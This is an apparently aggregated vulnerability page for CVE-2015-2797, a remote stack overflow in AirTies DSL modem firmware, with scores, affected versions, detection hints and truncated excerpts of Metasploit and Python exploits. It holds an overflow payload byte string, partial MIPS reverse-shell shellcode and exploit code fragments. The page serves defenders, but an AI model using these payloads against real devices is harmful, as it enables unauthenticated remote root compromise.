CVE-2015-2797
published 2015-06-19CVE-2015-2797: Stack-based buffer overflow in AirTies Air 6372, 5760, 5750, 5650TT, 5453, 5444TT, 5443, 5442, 5343, 5342, 5341, and 5021 DSL modems with firmware 1.0.2.0 and…
PriorityP273critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
77.60%
99.5th percentile
Stack-based buffer overflow in AirTies Air 6372, 5760, 5750, 5650TT, 5453, 5444TT, 5443, 5442, 5343, 5342, 5341, and 5021 DSL modems with firmware 1.0.2.0 and earlier allows remote attackers to execute arbitrary code via a long string in the redirect parameter to cgi-bin/login.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| airties | air_firmware | <= 1.0.2.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x41*359 + \x2A\xB1\x19\x18 + \x41*40 + \x2A\xB1\x44\x40 + \x41*12 + \x2A\xB0\xFC\xD4 + \x41*16 + \x2A\xB0\x7A\x2C + \x41*28 + \x2A\xB0\x30\xDC
bytes↗
\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c
- →Detect HTTP POST requests to /cgi-bin/login with an abnormally long 'redirect' parameter (>359 bytes), which is the overflow offset for the vulnerable AirTies firmware. ↗
- →Check HTTP GET requests to /cgi-bin/login; a response body matching /login.html?ErrorCode=2 confirms the vulnerable endpoint is present and reachable. ↗
- →The exploit does not require authentication; monitor for POST requests to /cgi-bin/login from unauthenticated sources with large body payloads. ↗
- →The MIPS big-endian (MIPSBE) shellcode in the exploit spawns a reverse root shell; look for outbound TCP connections from AirTies devices following a POST to /cgi-bin/login. ↗
- →The Metasploit module uses an echo-flavour cmdstager with a linemax of 100 bytes; look for sequences of short echo commands being executed on the device after exploitation. ↗
- ·The stack overflow offset of 359 bytes before the return address overwrite is confirmed only for the Air5650v3TT FW 1.0.2.0 firmware; other affected models (Air6372, Air5760, Air5750, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021) are reported vulnerable but offsets are unconfirmed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Airties - login-cgi Buffer Overflow (Metasploit)
exploitdb·2015-06-01
CVE-2015-2797 Airties - login-cgi Buffer Overflow (Metasploit)
Airties - login-cgi Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Airties login-cgi Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow vulnerability on several Airties routers.
The vulnerability exists in the handling of HTTP queries to the login cgi with long
redirect parametres. The vulnerability doesn't require authentication. This module has
been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as v
Exploit-DB
Airties Air5650TT - Remote Stack Overflow
exploitdb·2015-03-31
CVE-2015-2797 Airties Air5650TT - Remote Stack Overflow
Airties Air5650TT - Remote Stack Overflow
---
#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: [email protected]
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################
import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib
if __name__ == '__main__':
try:
ip = sys.argv[1]
revhost = sys.argv[2]
revport = sys.argv[3]
except:
print "Usage: %s " % sys.argv[0]
host = struct.unpack('>L',socket.inet_aton(revhost))[0]
port = string.atoi(revport)
shellcode = ""
shellcode += "\x24\x0f\xff\xfa
Metasploit
Airties login-cgi Buffer Overflow
metasploit
Airties login-cgi Buffer Overflow
Airties login-cgi Buffer Overflow
This module exploits a remote buffer overflow vulnerability on several Airties routers. The vulnerability exists in the handling of HTTP queries to the login cgi with long redirect parameters. The vulnerability doesn't require authentication. This module has been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/120335http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/http://www.securityfocus.com/bid/75355https://www.exploit-db.com/exploits/36577/https://www.exploit-db.com/exploits/37170/http://osvdb.org/show/osvdb/120335http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/http://www.securityfocus.com/bid/75355https://www.exploit-db.com/exploits/36577/https://www.exploit-db.com/exploits/37170/
2015-06-19
Published